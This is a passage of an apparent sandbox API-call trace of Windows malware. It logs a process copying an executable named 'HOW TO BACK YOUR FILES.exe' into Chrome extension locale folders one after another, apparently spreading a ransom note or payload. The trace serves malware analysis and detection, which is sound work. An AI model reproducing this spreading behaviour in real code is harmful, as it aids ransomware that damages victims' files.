Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" [0104.805] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro" [0104.806] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.806] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.806] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.806] GetLastError () returned 0x0 [0104.807] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.807] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.807] CloseHandle (hObject=0x120) returned 1 [0104.807] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.807] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835aa220, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d576360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d576360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.807] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" [0104.807] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT" [0104.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.808] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.808] GetLastError () returned 0x0 [0104.808] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.808] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.808] CloseHandle (hObject=0x120) returned 1 [0104.809] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.809] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835990b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d576360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d576360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.809] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.809] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.809] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" [0104.809] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR" [0104.809] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.809] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.810] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.810] GetLastError () returned 0x0 [0104.810] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.810] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.810] CloseHandle (hObject=0x120) returned 1 [0104.810] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.810] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835969a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d576360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d576360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.811] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.811] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.811] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" [0104.811] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt" [0104.811] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.811] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.812] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.812] GetLastError () returned 0x0 [0104.812] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.812] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.812] CloseHandle (hObject=0x120) returned 1 [0104.812] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8358f470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d59c4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d59c4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.812] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.812] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.813] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" [0104.813] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl" [0104.813] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.813] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.813] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.814] GetLastError () returned 0x0 [0104.814] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.814] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.814] CloseHandle (hObject=0x120) returned 1 [0104.814] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.814] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83580a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d59c4c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d59c4c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.814] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.814] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.814] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" [0104.814] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl" [0104.814] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.815] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.815] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.815] GetLastError () returned 0x0 [0104.815] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.816] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.816] CloseHandle (hObject=0x120) returned 1 [0104.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835794e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d5c2620, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d5c2620, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.816] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.816] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.816] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" [0104.816] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb" [0104.816] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.816] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.817] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.817] GetLastError () returned 0x0 [0104.817] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.817] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.817] CloseHandle (hObject=0x120) returned 1 [0104.818] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.818] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application 